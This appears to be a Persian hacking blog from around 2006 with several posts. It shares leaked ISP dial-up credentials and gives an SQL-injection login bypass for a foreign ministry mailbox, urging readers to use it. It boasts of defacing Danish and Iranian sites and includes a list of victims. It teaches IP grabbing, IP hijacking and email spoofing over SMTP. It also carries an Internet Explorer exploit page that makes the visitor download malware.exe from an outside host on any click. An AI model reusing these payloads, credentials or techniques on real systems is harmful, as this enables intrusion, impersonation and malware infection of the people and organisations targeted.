تبليغاتX
Free Hit Counter
Free Hit Counter آموزش هک و رجیستری و اخبار اینتر نت نکا
با سلام

این کارت توسط یکی از اعضای ایرچتان به نام ®sub_zero هک شده است.

اين کارت به صورت بی نهايت ميباشد و بايد بگم که شما باز ميتونيد

از اين کارت بازم کارت هک کنيد ! روی اين ISP  اکسپليت Kaht II  کار ميکنه و ميتونيد از ديگران نيز

شل بگيريد . و بايد اينم بگم که اين کارت Filter  نميکنه سايت ها رو ( استفاده خلاف نکنيد )

Entry Name : iums
Phone / Host : 88052971
User Name : hebrahim
Password : pbus3658
Domain :
Owner : System
User Profile : zandiyeh

مورد استفاده در تهران

ZCteam ®>ZeroCool®

+ نوشته شده توسط ZeroCooL® در سه شنبه نهم خرداد 1385 و ساعت 1:7 |
تيم امنيتي دلتا در اقدامي جديد و به نشانه اعتراض شديد به اقدامات اخير دانمارك و توهين به حضرت محمد اقدام به حمله به تعدادی از سايت های اصلي كه در ان كاريكاتور قرار داده شده بود نمود وكل سايت را به همراه back up  حذف كرد .

همچنين در هفته اتي پروژه بسيار سنگيني عليه كشور دانمارك صورت خواهد گرفت.اين حمله توسط مدير تيم farzadtrojan  صورت گرفته است.

همچنین نوع سرور Remot  و آسیب آن Priv8  و حمله از طریق FTP  بوده است.
همچنین مدیر این گروه گفته است : که تمام سایتهای DK  طی چند روز آینده به طور کامل دیفیس میشود.

سایت اول : http://web.go.i-d-s.ch

سایت دوم : http://www.g-p-c.dk

اینم لینک ثبت شده در Zone-h :  

http://www.zone-/h.org/defacements/mirror/id=3312888

MosyAnsar.com

چه بی پدر مادرایی پیدا میشن.

+ نوشته شده توسط ZeroCooL® در دوشنبه هفدهم بهمن 1384 و ساعت 22:56 |
******* وزارت امور خارجه *********

دسترسی به میل باکس سایت ملی دولتی وزارت امور خارجه با یک تزریق ساده برای همه ... اين آسيب ‍‍‍پذیری  توسط گروه  Y! Underground پخش شده.

در صفحه ی لاگین  با وارد کردن  admin  به جای یوزرنیم و  ' or  ' به جای پسورد ميتونين به تمام ايميل ها دسترسي داشته باشين.

mosyansar.com

بابا من امتحان کردم فوق العاده بر نظیره . اسم چه کسایی رو میبینین ! فقط شلوغش نکنید که به همه میرسه.

به کافینت های نکا هم یه دست و رویی بکشید. مدتیه که دست نخورده مونده.

ZeroCool®

+ نوشته شده توسط ZeroCooL® در جمعه چهاردهم بهمن 1384 و ساعت 8:8 |
در اين مقاله  6روش براي بدست آوردن اي پي توضيح داده شده

روش اول: استفاده از لینک تقلبی است لینک تقلبی همان ip  شماست که  به وسیله  برنامه ای مانند  Ipeasy آماده ی استراق سمع  می شود به اين صورت که شما وقتی با این برنامه ها ip  خود را براي یک فرد یا یك چت روم می فرستید با کلیک افراد بر روی آن ip  یک ارتباط بر قرار شده و برنامه به شما می گوید که چه سیستمی با چه ip  ای با شما ارتباط داشته و ip  وی در قسمت stolen ip  نمایش می یابد            داونلود Ipeasy                                                                                                                                       روش دوم: دعوت به گپ اي سي كيو شما از دوستتان دعوت ميكنيد كه با شما در ICQ  به گپ زدن بپردازد شما در همين لحظه در منويstart  به گزينه run  رفته و مينويسيدcommand  وبعد فرمانnetstat -tرا اجرا مي كنيد شما در لحظه اي كه اين كار را انجام مي دهيد اگر صفحه اي به غير از ICQ  باز نباشد فقط يك اي پي به شما نشان مي دهد كه اون اي پي شخص مورد نظر است                                                                    روش سوم پيدا كردن آدرس ip  ي كامپيوتر: فرستادن يك فايل يا گپ زني صوتي (voice chat  ) از طريق يك پيام رسان (yahoo)است.بر خلاف نرم افزارICQ  كه تنها با شروع به گپ زني و اجراي فرمانnetstat -t  مي توان به آدرس ipي طرف مقابل دست پيدا كرد,در messenger  هاي فعلي كه در ايران بيشترين كاربر را دارند مثل (yahoo , msn) شما به راحتي ICQ  نمي توانيد ipطرف مورد نظر خود را در بياوريد شما ابتدا بايد فايلي براي طرف بفرستيد يا با او به گفت و گو بپردازيد بعد از آن شما فرمان netstat -tرا زده و به دنبال آدرس ipيي مي كرديد كه دو ويژگي زير را داشته باشد  1.وضعيت اتصال آن ESTABLISHED  باشد  2.در همان سطر در ستونLocal Address, آدرس ipي شما بهمراه پورت باز شده  80  آمده باشد بعد از اينكه اين دو را چك كرديد در همان سطر به ستونForeign Adress  توجه كنيد ipي شخص مورد نظر شما اين مي باشد اميد وارم اين براتون مفيد بوده باشد روش پنجم براي پيدا كردن ip  ي كامپيوتر: از دوست خود بخواهيد كه صفحه وبي را ببيند شما بايد صفحه وبي رو براي خود داشته باشيد مراكز زيادي هستن كه اين امكان رو به شما مي دهند من  2تا از آن ها رو به شما معرفي مي كنم تا شما براي گرفتن فضاي خالي براي صفحه وبتان از آن ها استفاده كنيد  1.www.geocities.com 2.www.freewebs.com  شما مي توانيد از اين  2سايت فضاي مورد نظرتان رو بگيريد حالا كاري كه شما بايد بكنيد اينه كه بر روي صفحه وبتان يك شمارشگر نصب كنيد كه باز هم يك سري از سايت ها هستن كه اين امكان رو به شما مي دهند شما در طي ثبت نام در اين سايت ها طوري آن ها رو تنظيم مي كنيد كه ipهايي كه با سايت شما در تماس هستند رو به ادرس ايميل شما بفرستد من معروفترين هاي آن رو براي شما معرفي مي كنم  1.www.webstat.com 2. www.gostats.com  حالا وقتي كار تموم شد از دوست خود بخواهيد كه صفحه وب شما رو ببيند روش چهارم براي پيدا كردن ip  ي كامپيوتر: دريافت نامه پست الكترونيك از طرف مقابل شما با گرفتن يك ايميل از طرف مقابل در ياهو مي توانيد آدرس آي پي او را بدست آوريد براي اين كار بايد در تنظيمات ياهو دست ببريد شما اول به ايميلتات ميرويد و در آنجا گزينه mail options  مي زنيد و در صفجه بعد به فسمت Mail Accounts  مي رويد و در آنجا گزينه اديت رو مي زنيد و در آنجا گزينه Show all headers on incoming messages  رو كه در Headers: هست فعال كنيد از اين پس هر كس يه شما ايميلي بزند شما آدرس اي پي او را در بالاي صفحه ميل مي بينيد حال شما بايد از دوستتان در خواست يك ميل كنيد. روش ششم براي پيدا كردن ip  ي كامپيوتر: استفاده از يك برنامه ip sinffer  اسنيفر ها برنامه هايي هستند كه با نظاره كردن بسته هاي اطلاعات موجود در يك شبكه اطلاعات مفيدي را در اختيار شما قرار مي دهد. براي مثال sinfferها مي توانند كلمات عبور (password) اشتراك هاي كاربري (account) اعداد كارنهاي اعتباري (credit account) اطلاعات بانك هاي و غيره را با كشف رمز و فاش كنند.يكي از انواع ساده اين برنامه ip sniffer  است كه آدرس ip  را پيدا مي كند.همچنين برنامه aim blackout  اين كار را با قابليت ها ي بالا براي شما انجام مي دهد

http://irchatan.com

+ نوشته شده توسط ZeroCooL® در پنجشنبه سیزدهم بهمن 1384 و ساعت 19:11 |
 

چگونه IP  خود را عوض کنيم؟
الف) درباره
در اين مقاله آموزش کی دیم چه جوري IP  خودتون را با يه IP  ديگه از همون Range  عوض کنين. هر موقع که به اينترنت وصل ميشين، پروتکل DHCP  به شما يه IP  تخصيص ميده. عوض کردن اين IP  کار چندان سختي نيست و البته ميتونه مفيد هم باشه! موقعي که شما تحت حمله DDoS  هستين يا وقتي که ميخواين تمامي درخواستها به يه وب سرور رو به طرف خودتون Redirect  کنين يا فرضاً وقتي که IP  شما بسته شده و ميخواين به جاي اون از يه IP  ديگه در Range  خودتون استفاده کنين و يا ... به تغيير دادن IP  احتياج پيدا ميکنين.
ب) اطلاعات مورد نياز
قبل از اينکه شما بتونين IP  خودتون رو عوض کنين، بايد يه سري اطلاعات جمع کنين. اين اطلاعات عبارتند از : محدوده IP  شما، Subnet Mask، مدخل (Gateway) پيش گزيده، سرور DHCP  و سرورهاي DNS
1. به دست اوردن محدوده IP  : بدست اوردن IP Range  اصلاً سخت نيست! فرض کنيد IP  شما  24.193.110.255  باشه. شما ميتونين به طور مشخص از محدوده زير براي IP  جديد خودتون انتخاب کنين  :
24.193.110.1  < [آي پي جديد] < 24.193.110.255         بدست آوردن ip   رو قبلآ گفتیم
2. به دست اوردن Subnet Mask، مدخل، سرور DHCP  و DNS  : به دست اوردن اينها هم ساده‌س! يه خط فرمان DOS  باز کنين و توش تايپ کنين ipconfig /all  شما حالا بايد بتونين يه چيزي شبيه به اين ببينين :

Host Name . . . . . . . . . . . . : My Computer Name Here
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : xxxx.xx.x
Description . . . . . . . . . . . : NETGEAR FA310TX Fast Ethernet Adapter (NGRPCI)
Physical Address. . . . . . . . . : XX-XX-XX-XX-XX-XX
Dhcp Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IP Address. . . . . . . . . . . . : 24.xxx.xxx.xx
Subnet Mask . . . . . . . . . . . : 255.255.240.0
Default Gateway . . . . . . . . . : 24.xxx.xxx.x
DHCP Server . . . . . . . . . . . : 24.xx.xxx.xx
DNS Servers . . . . . . . . . . . : 24.xx.xxx.xxx
24.xx.xxx.xx
24.xx.xxx.xxx
Lease Obtained. . . . . . . . . . : Monday, January 20, 2003 4:44:08 PM
Lease Expires . . . . . . . . . . : Tuesday, January 21, 2003 3:43:16 AM

خوب! اين تموم اطلاعاتي بود که نياز داشتين. بهتره اون خط فرمان DOS  رو باز نگه دارين يا اينکه اطلاعاتش رو کپي کنين. (براي کپي کردن، متن رو انتخاب کنين و يکبار روش کليک کنين)
3. عوض کردن IP  : براي عوض کردن IP  خودتون، اول بايد يه IP  انتخاب کنين (يادتون نره که تو محدوده باشه!) به نظر من بهتره اول مطمئن بشين که اين IP  جديد مُرده! (همون Dead) بلدين که چطوري؟ اين IP  رو پينگ کنين و اگه Time Out  داد مطمئن باشين که ميشه ازش استفاده کرد. حالا در Control Panel  بريد به Network Connections  و روي Connection  فعال دابل کليک کنين. دکمه Properties  رو بزنين و بريد به برگه Networking. حالا (Internet Protocol (TCP/IP  رو انتخاب کنين و دکمه Properties  رو بزنين. در پنجره جديدي که باز شده، قسمتهاي Use the following IP address  و Use the following DNS server addresses  رو با توجه به اطلاعاتي که در قسمت  2  به دست اوردين پر کنين. در قسمت اول، IP  اي رو که انتخاب کرديد (IP  جديد) و در قسمت دوم، آدرس DNS Server  رو وارد کنين. حالا تغييرات رو ثبت و تأييد کنين. فقط يه تست کوچيک مونده! در مرورگر خودتون، آدرس يه سايت رو وارد کنين. اگه صفحه سايت اومد، بدونين که با IP  جديد دارين کار ميکنين. براي اينکه مطمئن بشين که تغييرات اعمال شدن، دوباره در خط فرمان DOS  تايپ کنين ip config /all  اگه پس از اجراي اين دستور، IP  و DNS  جديد رو ديديد، بدونين که درست عمل کرديد.
ج) حملات DDoS  و DoS

اگه فايروال شما نشون بده که شما تحت يه حمله DDoS  هستين، اين معمولاً موقعيه که شما داريد از طرف يک يا چند تا IP  از طريق UDP  مورد حمله قرار ميگيرين. در اين حالت شما ميتونين با استفاده از روش "عوض کردن IP" که در بالا توضيح داده شد، از خودتون محافظت کنين.

د) وب سرورها و سرويس هاي ديگه

اگه شما ميدونين که در محدوده IP  شما يه وب سرور قرار داره، ميتونين IP  اون رو بدزدين و خودتون يه وب سرور بشين! به اين ترتيب هر درخواست DNS  اي که براي اون IP  ارسال بشه، به شما Redirect  ميشه و به جاي اون سايت، صفحه شما نشون داده ميشه!

البته دزديدن IP  معمولاً کار درستي نيست! چون ممکنه به بستن حساب شما منجر بشه!
 

ترجمه شده از متن درس سایت astalavista     متن انگليسي آن

http://irchatan.com

+ نوشته شده توسط ZeroCooL® در پنجشنبه سیزدهم بهمن 1384 و ساعت 19:8 |
هر سرور برای ارسال ایميل از پروتکل  SMTP  استفاده ميکنه. اين پروتکل توانايي خواندن  E-mail  را نداره و فقط مي‌تونه  E-mail  بفرسته.پورت  ۲۵  : اين پورت  ۲۵  براي ارسال  E-mail  به‌کار مي‌ره و اين پورت از برنامه های  SMTP Server  برای ارسال استفاده می کنه. برای صحبت کردن با پورت  ۲۵  اول بايد يک  Server  پيدا کنيم که پورت  ۲۵  در آن باز باشه و بعد بايد طبق معمول از  telnet  براي ارتباط استفاده کنيم.

SMTP Server  ها اهميتي نمي‌دهند که شما کي هستيد و به کي می‌خواهيد ميل بزنيد، بلکه فقط کار خود را مي‌کنند. پس به هر آدرس توجه کامل نکنين، شايد جعلی باشه      چگونه يک  SMTP  سرور پيدا کنيم :

کار سختي نيست. ولی ما توصيه مي‌کنم از سروری کمک بگيرين که مربوط به  Mail Box  قرباني است. SMTP Server  در نهايت روی يک سرور قرار دارد پس در حتما آدرس آن چيزی مثل  smtp.noavar.com، mx01.hotmail.com  و ... هست.

سايت‌  google  رو باز کنيد و عبارت  SMTP Server  را سرچ کنين. هزاران سرور پيدا می کنين.زود برين به آدرس  http://www.mob.net/~ted/tools/mx.php3  بعد نام سايت را مي‌نويسين و دکمه  lookup  را کليک مي‌کنين.(مثلا  yahoo.com  ) و می بينين:

Domain Server: ns.cw.net

yahoo.com mail is handled by 5 mx4.mail.yahoo.com.

yahoo.com mail is handled by 1 mx1.mail.yahoo.com.

yahoo.com mail is handled by 1 mx2.mail.yahoo.com.

مشخصه که  SMTP Server  های سايت  yahoo.com  عبارتند از: mx1.mail.yahoo.com , mx2.mail.yahoo.com , mx4.mail.yahoo.com

 خوب حالا ميخوايم به يه نفر (مثلا ا ی ميل بزنيم و ميخوايم که طرف خيال کنه که از طرف  irchatan_helper  است. (هر دو در سايت ياهو)  برای اين کاراز  telnet  برای برقراری ارتباط استفاده می کنم. دستور زير را در اعلان داس تايپ کنين.

telnet mx1.mail.yahoo.com 25 

۲۵ همون شماره پورت ای ميل هست و از سرور اصلی ياهو هم استفاده کرديم.خوب حالا شما بايد اين رو بينين:

220  YSmtp mta499.mail.yahoo.com ESMTP service ready

دقت کنيد که چون از  telnet  استفاده مي‌کنين، چيزهايي را که تايپ مي‌کنين، نمي‌بينين و نمي‌تونيد از دکمه  BackSpace  استفاده کنين.تايپ کنين  HELO yahoo.com  و جواب مي‌شنويم: 250  mta499.mail.yahoo.com

حالا بايد مشخص کنم که  E-mail  فرستنده چيه. پس مي‌نويسم: MAIL FROM: irchatan_helper@yahoo.com

حالا بايد بگم که اين  E-mail  به چه آدرس ارسال بشه  مثلآ RCPT TO: yaftz@yahoo.com

 وDATAحالا بايد بنويسم  Enter  بزنم و جواب مي‌شنوم:354  go ahead

 اينجا وقت تايپ کردن يک سری چيز‌های اساسي است. اول مي‌نويسم

From: R D irchatan_helper@yahoo.com  اين همان اسمي است که به عنوان  Sender  يا همان  From  ديده ميشه. حالا مي‌نويسم:salam  و بعد Subject  اين هم در آن  E-mail  به عنوان  subject  ديده ميشه. 

MIME-Version: 1.0

Content-Type: text/plain;

خوب دوبار  Enter  زده و متن نامه را مي‌نويسم:

دقت کنيد که يک . (نقطه) در سطر آخر بنویسید و بعد  Enter  بزنید. با اين روش به پورت  ۲۵  ميگيدکه متن نامه تمام شده.

مي‌نويسم  QUIT  تا ارتباط قطع و از  telnet  خارج بشيم

http://irchatan.com

+ نوشته شده توسط ZeroCooL® در پنجشنبه سیزدهم بهمن 1384 و ساعت 19:6 |
روز گذشته در تاریخ  14  ژانویه  2005  حفره امنیتی خطرناکی در برنامهInternet Explorer  نسخه6  سرویس پک2  کشف شد که از نوع دور زدن مجوزهای تعریف شده یک سرویس می باشد. در حال حاضر مرورگر Internet Explorer  عمومی ترین مرورگر وب می باشد که بیشترین تعداد کاربران را در بین مرورگرهای اینترنت داراست. مایکروسافت درService Pack 2  ویندوز XP  قسمتی را طراحی کرد که دانلود هر فایل را توسط information bar  مسدود کند که به موجب آنUser  باید حتما بر روی فایل مورد نظر خود کلیک و آنرا با گزینه File Download  انتخاب کرده تا بتواند آنرا دانلود کند. مکانیزم information bar  به صورتی است که باBlock  کردن کدهای مخرب و فهمیدن تمام مراجع قادر به دانلود کردن صحیح فایل ها می باشد. توسط این باگ هکر می تواند با استفاده از کدی قربانی خود را مجبور به دانلود کردن یک فایل با کلیک او بر روی هر قسمت صفحه حتی اگر hyperlink  نباشد,  بکند و بدین وسیله information bar  را دور بزند.

دوستان عزیز برای امتحان کردن این باگ می توانند کد زیر را کپی کرده و در یک صفحه html قرار دهند. لازم به ذکر است که در ابتدای هر خط باید کد ">" را اضافه کنید.

------------------------ cut here --------------------------------------
!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
!-- saved from url=(0031)http://theinsider.deep-ice.com/ -->
HTML><HEAD><TITLE>The-Insider http://theinsider.deep-ice.com>
META http-equiv=expires content="01 Jan 1998 01:01:00 GMT">
META http-equiv=Content-Type content="text/html; charset=windows-1252">
META http-equiv=Content-Language content=en-us>
META content=True name=HandheldFriendly>
META content="MSHTML 6.00.2900.2523" name=GENERATOR></HEAD>


embed>
body onclick='a=document.createElement("\<iframe
src=\"http:\/\/theinsider.deep-
ice.com\/malware.exe\"\>\<\/iframe\>");document.body.appendChild
(a);setTimeout("document.execCommand\(\"refresh\")",1000)'>
cebter><br><br><br><br><br><br>Click AnyWhere You Want</center>
/BODY></HTML>
------------------------ cut here --------------------------------------

برای در امان ماندن از خطر این حفره نیز می توانید نسخه  Internet Explorer  خود را به آخرین Patch ارائه شده از سوی شرکت مایکروسافت Update  نمایید. موفق باشید.

بهروز کمالیان

گروه امنیتی آشیانه

Zerocool.blogfa.com

+ نوشته شده توسط ZeroCooL® در پنجشنبه سیزدهم بهمن 1384 و ساعت 18:38 |
گروه امنيتي آشيانه اقدام به هك حدود 200 سايت اينترنتي نمود.

به گزارش بخش خبر سايت اخبار فن آوري اطلاعات ايران، در اين اقدام كه سايتهاي معروفي همچون دانشگاه آزاد كرج، گروه زاگرس، سايت پژوهشكده ميكروالكترونيك ايران، سايت شركت آرين نوين رايانه به چشم مي‌خورد، هدف از اين اقدام هشدار به مسئولين ايراني سرور فوق بوده است.

به گفته يكي از اعضاي اين گروه، اين دستكاري در راستاي وارد نمودن هيچگونه خسارتي صورت نپذيرفته و فقط صفحه اول سايتهاي تغيير داده شده است.

در زير ليست سايتهاي هك شده آمده است:



abariss.com
abedihost.net
abshar-plastic.com
airsa.com
addressyab.com
epqco.com
alagam.com
alborzco.net
aminseir.net
amirha.com
safe-structure.com
arian.co.ir
arman-sedghi.com
artcenterforwcpp.com
asemanweb.com
avlelectronic.com
baghaco.com
barzinmehr.com
irantextilecenter.com
betonomid.com
nayebzadeh.com
bistoun.com
bm25feb.com
bozorg-gaz.com
cayerltd.com
com2x.net
cybermasters.net
dalirrooyfard.com
rasadaroodarman.com
b-daytarh.com
hdelbari.com
delta-data.net
dreamwebdesigner.com
eastgoldenkey.com
imamsadrnews.org
e-mashhad.ir
esilkway.com
estak.com
etwomen.org
farabi-sh.com
farazansoft.com
sardesigner.com
fanavaranmodj.com
fujancyclet.com
fxdlr.com
fxmnet.com
gabricce.com
gaameyek-eng.co.ir
gammajournal.com
garmayejonoob.com
garmakar.com
intitex.net
ghafouri-bros.com
bigboy.com
glucosan-co.com
golfaam.comharajweb.com
zagrosgp.com
honarhaye-ziba.com
geometronic.com
hosmz.net
hosseini-management-edu.com
hyperunity.com
ideh-co.net
imer.ir
imrctech.org
taheri.ir
irannano.com
iraninternetcard.com
charmikh.com
modirroosta-zartosht.com
tadbirgar.com
zanjansite.com
mykonkoor.com
visionone.com.tw
panel-co.com
vimtecpwg.com
vafadaran.com
ultrasotech.com
tuga.ir
tsfir.com
tosinger.com
toramagic.net
tooska.ir
tlzco.com
tlfw.dk
tisfoonkaraj.com
takalloomusic.com
tadbir.ir
tabassom.com
svhco.com
suntraceco.com
stonecraftir.com
standox-ir.com
track-bug.com
SilverScreenIns.com
sadranet.com
novincomputer.com
silver-abtahi.com
sharifedu.org
sharjahchess.com
sharifedu.net
sharifedu.com
shahrebaazi.com
abalfazl.com
senobar.com
sekeh-rec.com
scdsystems.com
samanhotel.com
samanrahavard.com
sainafaraz.com
sabzevarnews.net
vasfesaba.com
saatiran.com
rtg-co.com
rezcoiran.com
resanatech.com
rayanehranazar.com
rahgoshamehr.com
rahavard110.com
rabbitnetwork.com
payetakhtfurniture.com
presskooshki.com
pouyanpokht.com
pooriasystem.com
platinumprovider.us
platinumprovider.com
pkd.co.ir
pi-group.org
persiancv.net
persiancv.com
petropeymanpars.com
parstechsun.com
parsnetsol.com
parspolymer.ir
parmida.net
pardehmahan.com
papital.com
pandacard.net
osc-project.com
onlinecard.ir
omidgostar.com
oilfilmfestival.com
nooriran.com
nima-sang.com
netkadeh.com
namehmech.net
naghshbayan.com
akco.biz
mtalebi.com
motalefeh.ir
mojezendegi.com
misaghtavassoli.com
mft-iran.com
messiworkshop.com
melodyteam.com
iranianmobilemelodies.com
mehrjavid.com
golenarges.info
mattilda.com
futureismine.com
gt-co.biz
mahdischool.com
lesani.net
larestantoday.com
hajikhani.com
komeyl.com
rayansafe.com
kiau.ac.ir
khodavandlucifer.com
khmprinting.com
karsoa.com
karajtour.com
karaj-fso.com
kamancable.com
kamalulmolk.com
kalber-dairy.com
sabzevarian.com
jamshidjamalian.com
jameehmodarresin.com
ghadiriweb.com
itmaltd.com
khalijservice.com
karajgasht.com
karsoa.com
karajtour.com
karaj-fso.com
kamancable.com
kamalulmolk.com
kalber-dairy.com
sabzevarian.com
jathas.com
itmaltd.com
isar-trading.com
iranvisacard.ir
irantravel.com
irssc.com
irsn.ir
irsbb.com
irsat.net
irsat.com
payflow.iraninternetcard.com
+ نوشته شده توسط ZeroCooL® در سه شنبه یازدهم بهمن 1384 و ساعت 7:13 |
سایت موزیلا (قسمت برزیلی ) توسط گروه آشیانه هک شد.

http://www.mozilla.org.br/saite/imgup/


  • راستی دست همه ی اونایی که زحمت می کشن نظر می دن درد نکنه حتی بعضیا ! که از خودمونن !
  • ولی لطفا ایمیل هاتون فعال باشه تا جواب خصوصی دریافت کنید

holy_spirit

+ نوشته شده توسط روح مقدس در شنبه بیست و ششم آذر 1384 و ساعت 16:30 |

اکسپلویت یک نوع کد و سورس یک برنامه است که معمولا با استفاده از باگ ها و اشکالات موجود در برنامه ها یا سیستم هایی که به اینترنت وصل هستند توسط یک نفر که به زبان های برنامه نویسی و بیشتر C وارد است نوشته می شود که بعد از کامپایل کردن آن می توانید به صورت راه دور و Remote و به وسیله ی آن باگ به کامپیوتر دیگران وصل شوید.اکسپلویت ها به دو زبان C و Perl نوشته می شوند و برای کامپایل کردن آن ها به کامپایلرهای مخصوص خودشان نیاز دارید مثلا اگر اکسپلویتی با زبان C دارید باید با  Visual C++, Turbo C , LCC win32 نیاز دارید و برای آن هایی که به زبان پرل نوشته شده اند نیاز به برنامه ی Active Perl دارید

نحوه ی کامپایل کردن این اکسپلویت ها به صورت تصویری برای کسانی که در گروه Red Flag عضو شوند قرار داده خواهد شد

همه ی اکسپلویت ها فقط برای ویندوز نوشته نشده اند بلکه بیشتر و البته بهترین آن ها برای Linux نوشته شده اند سایت هایی که اکسپلویت منتشر می کنند مانند:

www.frist.com

www.securityfocus.com

www.eeye.com

www.openwall.com

نمونه ای از یک اکسپلویت

خوب از کجا بفهمیم اکسپلویت برای ویندوز هستش یا لینوکس؟

اگر در اوایل سورس یکی از نشانه های <winsock2.h> یا <win32.h> یا <windows.h> بود برای ویندوز و اگر یکی از نشانه های <sys/socket.h> یا <sys/types.h> یا <sys/ioctl.h> یا <sys/times> بود برای لینوکس است و اگر !/usr/local/bin/perl رو داشت برای پرل است

اکسپلویت ها بعد از کامپایل شدن یک Usage یا نحوه ی استفاده به شما می دهند که می توانید بر اساس آن ها از اکسپلویت استفاده کنید

مثال:

usage: jil <victimHost> <victimPort> <attackerHost> <attackerPort>

که باید به این صورت استفاده شود:

<پورت مورد نظر هکر بر روی سیستم خودش> <آدرس آی پی خود هکر> <آدرس پورت قربانی> <آدرس آی پی قربانی> Jil

خوب پس از اجرای این عملیات شما می توانید به سیستم قربانی حمله کرده و با سطح دسترسی مدیر Administrator وارد سیستم او شوید

 

 

منبع : سیا هکر

+ نوشته شده توسط نابخشوده در سه شنبه پانزدهم آذر 1384 و ساعت 23:29 |
سلام دوستان , Telnet  در اصل پروتکلي است که براي login  و استفاده از يک کامپيوتر ديگر به کار مي رود. روش اجراي Telnet  در لينوکس يا انواع ديگر Unix  و نيز ويندوز  2000  تا حد خيلي زيادي شبيه چيزي است که ما گفتيم. براي آشنايي بيشتر با telnet  و گرفتن جواب دقيقتر سوالات بالا روي مـــن کليک کنيد که به يک ميزبان واقعي Telnet  شما را متصل مي کند که مي توانيد به رايگان عضو شويد و از خدمات آن استفاده کنيد. خواهيد ديد که لينک فوق در حقيقت Hyper Terminal  را باز مي کند. در حقيقت هم اگر به درون Hyper Terminal  برويد مي توانيد در قسمت برقراري تماس با انتخاب TCP/IP  مستقيما از آن به عنوان Telnet  استفاده کنيد. اما اينکه Telnet  در هک چه نقشي داره و چه فايده اي داره کلاً رو از زبان "کارولين مينل" برايتان مي نويسم: "فقط با يک سرويسگير Telnet  [مثل همين Telnet  خودمون در ويندوز] شما مي توانيد:
· ايميل بفرستيد.
· سورس (متن برنامه) سايتها را بخوانيد.
· به ميزبانهاي وب وروديهاي غير منتظره بفرستيد که مي تواند سبب دريافت پاسخهاي شگفت انگيز و گاهي غير قانوني شود.
· به بسياري از ديگر سرويسهاي کامپيوترهاي ميزبان وب ورودي دلخواه خود را بدهيد.
· در سرويسهايي که ميزبانها، روترها و حتي کامپيوترهاي شخصي مردم در منزلشان در اختيار شما مي گذارند کاوش و جستجو کنيد."

تلنت کردن معمولا اولين کاري است که يک هکر براي هک کردن يک سايت انجام ميدهد، زيرا بعضي از پورتها در صورت بسته نبودن روي آن سرور، معمولا حاوي اطلاعات بسيار مهمي هستند.(به همين دليل ما بايد اول پورتها رو چک کنيم بعد telnet  چون اگر پورتي که ما بهش telnet  ميکنيم close  باشه دستور اجرا نميشه) . موضوع مهمي كه يك نفوذ گر واقعي به آن توجه مي كند در سه اصل خلاصه شده است  :

۱- او هيچگاه سعي در استفاده از برنامه هايي كه ديگران نوشته اند نمي كند ... »البته ممكن است تعدادي از هكر ها باشند كه با استفاده از تروجان ها يا Back doors  ها به اين كار بيپردازند و فقط خود را با اين مباحث ساده درگير کنند.

2- معمولا از به كارگيري برنامه هاي گرافيكي كه حتي خود طراحي كرده اند نفرت دارند و فقط در دنياي سياه و سفيد msdos-prompt  براي خود حكومت تشكيل ميدهند.(در اصل از استفاده نرم افزار براي هک نفرت دارند)

3- موضوع سوم و اساسي اين است كه فقط يك چيز را در دنيا ميشناسند و آن هم تايپ كردن است.تايپ در صفحه سياه و سفيد command prompt  .

در ويندوز XP، يکي از بهترين ابزارهايي که در دست شماست، همان صفحه مشکي Command prompt  است. در ويندوز XP  دو نوع DOS  وجود دارد. يکي cmd.exe  و ديگري command.com  که cmd.exe  براي کارهاي ما مناسبتر است و کليک روي دگمه Start  و انتخاب All programs  و انتخاب Accessories  و سپس کليک روي Command prompt  نيز همين را باز خواهد کرد. (راه مناسبتر: دگمه ويندوز کيبورد را به همراه حرف R  فشار دهيد، تايپ کنيد cmd  و Enter  کيبورد را فشار دهيد). تايپ کردن Help  و فشردن Enter  ليستي از دستورات را براي شما به نمايش در مي آورد که متاسفانه دستورهاي مناسب براي هک را از قلم انداخته است. (ناگفته نماند که Help  ويندوزXP  اگر بدانيد که در کجاي آن به دنبال چه بگرديد نسبتاً کامل است). از جمله مهمترين اين دستورها مي توان به دستورات زير اشاره کرد:
TCP/IP command: telnet, netstat, nslookup, tracert, ping, ftp
NetBIOS commands: nbtstat, net use, net view, net localgroup  (و چند دستور ديگر)
در اين شماره، براي اينکه هم کمي با telnet  (که به عنوان يکي از مهمترين ابزارهاي هک مطرح بوده و هست) آشنا شويد هم از موضوعي شروع کرده باشيم که ملموس و جذاب باشد، فرستادن ايميل از طرف هرکسي به هرکسي با telnet  را آموزش مي دهيم (من هم مي دونم که راههاي آسونتري براي اين کار هست و راحتترين راهش استفاده از Outlook  مايکروسافت است، اما مطمئنم از ديدن پشت صحنه نمايش فرستادن ايميل لذت خواهيد برد). قبل از هر چيز بگم که telnet  کردن به خودي خود جرم نيست و استفاده از telnet  براي فرستادن يا گرفتن ايميل نه ضرري براي شما دارد و نه ميزبان. اما شما اين حق را نداريد که از طرف کسي به کس ديگر ايميل بزنيد مگر با اجازه آنها.اول وارد صفحه سياه خط فرمان شويد (مراحل نوشته شده در بالا)، حالا مي خواهيم از دستور telnet  استفاده کنيم: telnet target port  به جاي target  آدرس سايت يا کامپيوتر و به جاي port  بايد آدرس پورت را وارد کنيد. در مثال اين شماره با فرستادن ايميل (smtp) سروکار داريم که پورت آن  25  است و آدرس نيز آدرس يک سرور ايميل بايد باشد. به عنوان مثال telnet mail.hamsafar.com 25  را خواهيم داشت. همسفر، وب سايت من که عضويت در آن را به شما توصيه مي کنم، فقط يک مثال است و شما مي توانيد از هر آدرس مشابهي استفاده کنيد. جوابي دريافت خواهيد کرد که معمولا شامل نام ميزبان ايميل است. حالا وقت سلام کردن با دستور helo  است (دستور ehlo  هم داريم که مي توانيد امتحانش کنيد). بهتر است جلوي helo  آدرس ايميل فرستنده را درج نماييد. با گرفتن جواب سلام، براي فرستادن ايميل از دستور mail  استفاده مي کنيم:mail from leyli@masalan-ye-sity.com  بعد از گرفتن OK  حالا گيرنده را معرفي مي کنيم: rcpt to: majnoon@hamsafar.com  اين بار بعد از گرفتن OK  دستور data  را تايپ و Enter  کنيد. توجه کنيد که ميزبان به شما مي گويد وقتي کارتان تمام شد . بزنيد که اين يعني زدن يک Enter، تايپ کردن يک نقطه و دوباره زدن Enter. حالا وقت وارد کردن Subject، to  و from  و سپس زدن دو Enter  و وارد کردن متن ايميل و سپس زدن Enter، تايپ کردن نقطه و 